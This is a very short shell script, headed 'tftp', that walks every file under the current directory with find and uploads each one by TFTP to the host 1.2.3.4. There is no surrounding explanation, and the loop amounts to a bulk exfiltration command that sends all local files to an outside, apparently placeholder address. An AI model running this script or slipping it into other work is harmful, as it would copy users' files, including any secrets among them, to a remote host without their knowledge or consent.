# # tftp # #! /bin/sh for file in $(find ./ -type f -print) do tftp -p $file 1.2.3.4 $file done # # End of file